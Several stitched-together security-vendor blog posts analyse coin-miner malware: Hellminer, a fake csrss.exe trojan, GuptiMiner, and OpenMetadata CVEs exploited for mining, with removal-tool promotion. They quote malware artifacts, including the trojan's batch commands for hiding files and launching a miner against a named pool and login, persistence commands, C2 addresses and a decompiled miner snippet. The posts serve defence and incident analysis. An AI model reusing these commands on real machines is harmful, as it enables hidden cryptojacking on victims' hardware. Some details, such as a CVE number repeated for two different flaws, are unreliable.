This is a process associated with a malicious coin miner. Such malware aims at exploiting the system’s hardware to mine cryptocurrencies, mainly DarkCoin and Monero. To maximize profits, hackers who stand behind this malware establish huge networks of infected computers. Hellminer takes up to 80% of CPU power in order to get substantial mining performance, making the system sluggish and uncomfortable to use.

Malicious miners like this one typically get into the user systems through malvertising on the Web, or with the use of dropper malware. Both spreading ways though are commonly used by other malware, which means the risk that Hellminer is not the only infection running in the system.

This malware appears to be different from other miners, as it is not based on XMRig, a popular open-source mining software. Instead, it appears to be written in Python, and is likely a private development. Let’s check out other interesting stuff I’ve found during the analysis.

Hellminer Malware Analysis

It is not completely clear how Hellminer gets into the system; I suspect it is not much different from how malware miners typically spread – via dropper malware and malvertising. After the launch, the malware begins with a selection of anti-VM and anti-debug checks.

Using the calls to WMI, it gets the info about the CPU, trying to find any signs of virtualization. Why I don’t think it is just an immediate info gathering is because the very next step is listing the services and processes. Hellminer specifically seeks for traces of the VMWare virtualization environment. After these checks, the main payload is unfolded. Though, malware may as well use the info collected at this stage, to configure the mining process or as a part of the system fingerprint.

wmic cpu get Name,CurrentClockSpeed,L2CacheSize,L3CacheSize,Description,Caption,Manufacturer /format:list

Fingerprinting starts with another call to WMIC, wmic os get Version. Malware attempts to receive quite a basic, if not scarce, set of data – just the info about the operating system. After that, malware gains persistence through the manipulation with another command and series of changes in Windows registry.

%windir%\System32\svchost.exe -k WerSvcGroup – starting Windows error reporting service to make it run the malware. This increases the level of privileges the malicious program has, also providing it with a disguise.

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security – changing network security policies.

The final round of persistence involves another call to WMI, specifically to its Adaptation Service. Hellminer forces it to recursively launch the payload, ensuring continuous execution. This specific command is also a part of resource allocation for the mining process.

wmiadap.exe /F /T /R

Command Server Connectivity

Same as other malware miners, Hellminer does not have any extensive C2 communication. After finishing the steps from the above, it sends the blob of system information to the command server, effectively notifying it about the readiness. C2 returns the configuration file, which specifies the mining pool and the IP address to connect to.

Still, there is a thing that catches an eye – the form of command servers used by this malware. They do not look like C2 of a classic model, instead being a peer-to-peer one. In such a network, the role of a command server is given to one of the infected computers. “Real” server sporadically communicates with one, retrieving the information about the new devices and assigning the next system to get the C2 role. This drastically increases the sustainability of the network, making it particularly hard to disrupt through the command server disruption.

During the analysis, I’ve detected these command servers:

• 20.99.184.37:443
• 20.99.186.246:443
• 23.216.147.64:443
• 192.229.211.108:80
• 20.99.133.109:443

Hellminer.exe Removal Guide

Removing Hellminer malware requires anti-malware software scanning. Such threats typically duplicate itselves to numerous folders across the system, with each acting as a backup. GridinSoft Anti-Malware is what would remove the malicious miner and all its copies in the matter of minutes.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Miner malware activity always correlates with cryptocurrency prices. At the moment, they are on the rise, meaning that more and more frauds will opt for this malware. The typical ways of spreading for malicious miners is malvertising, particularly ones in search engines. Avoiding it requires user attention: they typically mimic legitimate sites that spread freeware, but always have a different, mangled URL.

The post Hellminer.exe Coin Miner appeared first on Gridinsoft Blog.

What is Csrss.exe?

Csrss.exe is a legitimate Windows process with the full name of Client Server Runtime Process and is critical to the system. This process is present in all modern Windows versions, and it is not uncommon to notice several instances running back to back. Such a phenomenon is normal and is not considered a sign of viruses. The system runs one upon the startup, and terminating it leads to BSoD.

This process in Windows 7, 8, and 10 is responsible for console programs, shutdown processes, starting another vital process – conhost.exe – and other critical system functions. It uses a few resources in normal mode, so there is no reason to terminate it. It is needed for System shutdown, Virtual DOS Machine (VDM) support and other system functions such as Ctrl+C and Ctrl+Break signal processing, user switching, and mounting and unmounting disks. As a legacy function, csrss.exe is responsible for opening the console window, but only to the extent of launching the conhost.exe process.

Csrss.exe BSOD – How to Fix?

Sometimes, after unsuccessful manipulations with the Csrss.exe file or other system files, the Windows may become unstable or not start. The corruption of important Windows system files can cause this. The solution is as follows:

Go to the Troubleshooting menu – Advanced Options – Command Prompt in the recovery environment. At the command prompt that launches, execute the following command:

sfc /scannow /offbootdir=C:\ /offwindir=C:\Windows

After entering the command, press Enter and wait for the process to complete. This may take some time, but be sure to wait until the end, as it is required to finish the system files’ repair. After that, close the command prompt and restart your computer.

Analysis a Real Trojan Virus

We found several samples of Csrss.exe as Trojan Virus.

They can be downloaded from the Internet by the users themselves. Often when users open unknown files from the spam message, they infect the computer with different kinds of virus-like malware. But the malware developer usually has a plan B. They attach similar viruses to installing various free programs. Hence, if you skip the installation process and don’t look to the advantage setting, then ready that your computer will be infected with a virus-like this.

We discovered a sample of Trojan.CoinMiner written in Delphi, which is distributed via spam mail:

GridinSoft Anti-Malware detect it as “Trojan.Win32.CoinMiner.dd”

MD5: 922e0891ae30ac3adb3a09cb963570cc
SHA1: 77feeefff422519cdb63faa438fea87e5e70882a

Other antivirus programs detect Trojan.CoinMiner (csrss.exe) as:

Trojan Miner Drop Files:

C:\Windows\MicrosoftU
Auto.bat
Start.vbs
Start2.vbs
Hide.bat
Start.bat
Start2.bat
1.bat
2.bat
Srvany.exe
Csrss.exe
Srvanyx.exe

After Trojan.CoinMiner has been unpacked. It hides its presence using the strings in Hide.bat, setting the hidden and system attributes to the folder and files.

Attrib C:\Windows\MicrosoftU + S + H / S / D
Attrib C:\Windows\MicrosoftU\*. * + S + H / S / D

Trojan Miner uses the name of one of the system files “csrss.exe” to hide its presence in the system.

Csrss.exe virus starts with the following parameters:

• Stratum + tcp: //xmr.pool.minergate.com: 45560 – Resource for which “mining” will be entered
• Tatyana.kostomarova@gmail.com – user login from whom the extraction will be introduced
• Cryptonight – Mining algorithm

Another parameter is how many threads the program will work in. This “miner” has a formula for calculating the number of processor cores involved. It is in the .bat file that launches the “miner” for the first time:

Set / a CPU =% NUMBER_OF_PROCESSORS% / 2 + 1
Srvanyx -a cryptonight -o stratum + tcp: //xmr.pool.minergate.com: 45560 -u tatyana.kostomarova@gmail.com -p x -t% cpu%

High CPU & GPU Troubleshooting

If you encounter abnormal GPU and CPU consumption by the csrss.exe process, you should first check the file location. To verify it, right-click on it and select “Open file location“. It should be located at “%SYSTEMROOT%\system32“.

Next, right-click on the file and select “Properties“, then the “Details” tab. This file’s Product Name should be “Microsoft® Windows® Operating System“. Also, the Copyright section should be “© Microsoft Corporation. All rights reserved.”

If it is the original csrss.exe file, it may cause a high CPU/GPU load due to incorrect operation of the functions it is responsible for.

The Client Server Runtime Process’s excessive GPU consumption was previously a recognized problem in one of the Windows cumulative updates. However, Microsoft addressed the issue through various updates and hotfixes. You may still be using an older Windows version with this problem. If so, go to the Windows updates section and click “Check for updates“.

The next step is to update your GPU drivers. If you have an Nvidia, open Geforce Experience, and under the “Drivers” tab, click “Check for updates” and follow the instructions. If you have an AMD GPU, check the Radeon software for updates. It is vital to download drivers from official websites. Please avoid using low-trust sites or third-party installers like driver packs.

If the problem persists, run an SFC scan. To do this, run Command Prompt as administrator and paste the “sfc /scannow” command into it.

If the process csrss.exe still loads the device after all the manipulations, you can create a new user profile. To add a new user profile to your PC, go to Settings (gear icon) and select Accounts. Under Family & Other Users, click Add another person to this PC. Choose “I don’t have this person’s sign-in information” and then select “Add a user without a Microsoft account”. Fill in the details and click Next. Remember to grant administrator privileges only to those you trust.

Note: This guide is relevant for users of Windows 10. Windows 11 lacks the option to add a local account and asks you to use a Microsoft account.

Is CSRSS.exe trojan virus?

First, any claim that the “csrss.exe” file located in “C:\Windows\System32\” is a trojan virus is false. Low user knowledge along with unintelligible process names make system process names an excellent option for hiding malware. Usually, the malware tries to infect or disguise itself as critical system processes of the operating system. Also, many viruses use the name of that process or executable file to disguise itself so as not to make you suspicious. Each session creates a separate process, allowing the simultaneous running of several dozen processes.

Nevertheless, it is a good reason to worry if the csrss.exe high CPU and GPU load is constant. But even in this case, there are two options for abnormal process behavior: malware and user profile corruption. The original executable “csrss.exe” file is stored only in one place – in the “C:\Windows\System32\” directory. If only one OS is installed on the device, substituting or overwriting this file in the standard directory is almost impossible.

That being said, finding the files named “csrss.exe” in other directories on your PC is a sign of malware activity. To remove the threat, launch GridinSoft Anti-Malware.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Csrss.exe Trojan Virus appeared first on Gridinsoft Blog.

Campaign discovery and GuptiMiner

Avast specialists analyzed the activity of the GuptiMiner malware active since 2018. GuptiMiner is a sophisticated malware that aims at spreading backdoors and performing hidden cryptomining in corporate networks. The malware utilizes a multi-stage infection chain. It starts by hijacking antivirus software updates through man-in-the-middle (MitM) attacks. This allows attackers to substitute legitimate updates for malicious ones.

Avast informed eScan and India CERT of the found vulnerability, which was successfully patched on July 31, 2023. However, since users rarely install more than one antivirus, this limits the ability to detect and analyze the full scope of GuptiMiner’s activities.

This malware uses a complex infection chain. The attack starts by intercepting eScan antivirus updates. The update program is downloaded from the server, but in its path is an attacker who substitutes it with a malicious one. Next, eScan decompresses and downloads the package, initiating a chain of infection using a DLL. This DLL allows the virus to control further downloads and code execution.

Next, GuptiMiner uses a sideloading technique to inject malicious code into trusted processes, which allows the program to remain invisible to antivirus systems. The malware also communicates with remote command and control (C2) servers to receive commands and updates. This allows attackers to control infected systems, run additional malicious processes, or conduct cryptocurrency mining.

How does GuptiMiner work?

GuptiMiner analysis revealed that the malware used a variety of sophisticated techniques to install and hide its presence on the system. Key techniques included sideloading DLL, modifying system files, and using forged digital signatures to simulate legitimacy.

Also, one of the characteristic features of GuptiMiner is its ability to modularize infections. This includes performing DNS queries to the attacker’s DNS servers and extracting useful data from innocent-looking images. In addition to its core functionality of installing backdoors, GuptiMiner unexpectedly spreads the XMRig miner used to mine the Monero cryptocurrency.

The process of dynamically assigning mining threads for XMRig:
xmrig_shellcode_copy_ = xmrig_shellcode_copy;
num_cores_ = num_cores;
dword_140020908 = 25;
xmrig_shellcode_copy-›max_cpu_usage = '53';
xmrig_shellcode_copy_->threads = '1';
if (num_cores_ >= 6)
xmrig_shellcode_copy_-›threads = '2';
if ( num_cores_ >= 8 )
xmrig_shellcode_copy_->threads = '3';

The malware has been identified as potentially linked to the Kimsuky, a prominent North Korean hacking group. This indicates possible state sponsorship and a high degree of organization of the attacks. Before, North Korean hackers showed a certain degree of interest in acquiring cryptocurrency. So, this should not be too much of a surprise.

Two Different types of Backdoors

While analyzing the GuptiMiner malware, researchers identified two different types of backdoors. Both types of backdoors were designed to function as part of a large-scale and well-planned campaign. But each was designed to perform specific tasks on infected corporate networks.

• The first type of backdoor is a modified version of PuTTY Link, which is used to scan SMBs on the local network. This backdoor allows lateral movement (horizontal propagation of malware within the network) to access potentially vulnerable systems running Windows 7 and Windows Server 2008. This facilitates the exploitation of vulnerabilities in legacy operating systems.
• The second type of backdoor is multifunctional and modular. It accepts commands from the attacker to install additional modules and specializes in finding and stealing locally stored private keys and cryptocurrency wallets. This approach allows attackers to monitor infected systems for long periods of time and activate additional malicious features if necessary.

The post GuptiMiner Use eScan to Spread Miners and Backdoors appeared first on Gridinsoft Blog.

OpenMetadata Vulnerabilities Threats Kubernetes Workloads, Actively Exploited

According to the recent Microsoft security blog, cyber attackers leverage critical vulnerabilities within the OpenMetadata platform to infiltrate Kubernetes workloads. These vulnerabilities (CVE-2024-28255, CVE-2024-28847, CVE-2024-28253, CVE-2024-28848, and CVE-2024-28254) impact versions preceding 1.3.1. All of these vulnerabilities have different CVSS levels, with the highest being 9.8 and 9.4 (later about them). Successful exploitation allows attackers to bypass authentication and achieve remote code execution (RCE).

OpenMetadata is a discovery, observability, and governance platform with a central metadata repository, in-depth lineage, and team collaboration. It has metadata schemas, a metadata store, APIs, and an ingestion framework. Key features include data discovery. However, subsequently, these compromised workloads become conduits for illicit crypto-mining activities.

Identifying Critical Vulnerabilities

CVE-2024-28255 is a critical vulnerability (CVSS: 9.8) in the OpenMetadata platform, affecting its API authentication mechanism. In brief, the `JwtFilter` handles API authentication by verifying JWT tokens. However, attackers can bypass the authentication mechanism by requesting excluded endpoints using path parameters. However, developers fixed the issue in version 1.2.4.

CVE-2024-28255 is a second vulnerability with 9.4 CVSS that stems from JWT token validation deficiencies in JwtFilter. An authorization check called `authorizer.authorize()` is named after `prepareInternal()`, which gets executed and evaluates the SpEL expression. To exploit this vulnerability, an attacker can send a PUT request to `/api/v1/policies`. The issue can lead to Remote Code Execution and is fixed in version 1.3.1.

How Does The Attack Work?

The following describes the attack sequence observed in instances where Kubernetes workloads of OpenMetadata accessible via the internet have been compromised. Attackers identify vulnerable versions and exploit the vulnerabilities to gain code execution within the container hosting the compromised OpenMetadata image, thereby obtaining initial access.

Post-infiltration, attackers validate their intrusion and gauge control using a publicly accessible service. They utilize ping requests to domains ending with oast[.]me and oast[.]pro—associated with Interactsh—to confirm successful exploitation and validate connectivity before establishing a command-and-control channel and deploying malicious payloads.

Following successful access confirmation, attackers download crypto-mining malware from a remote server for XMR mining, executed with elevated permissions. It is noteworthy that Microsoft identified the attacker’s server location as China. Additionally, other malware targeting both Linux and Windows operating systems was uncovered on the attacker’s server.

Prevention and Mitigation Measures

To reduce the risk of potential vulnerabilities, we highly recommend updating the image version of clusters hosting OpenMetadata workloads to the latest version—specifically version 1.3.1 or newer. Additionally, if you are making OpenMetadata accessible via the Internet, it is crucial to employ strong authentication mechanisms and avoid using default credentials.

The post OpenMetadata Vulnerabilities Exploited to Abuse Kubernetes appeared first on Gridinsoft Blog.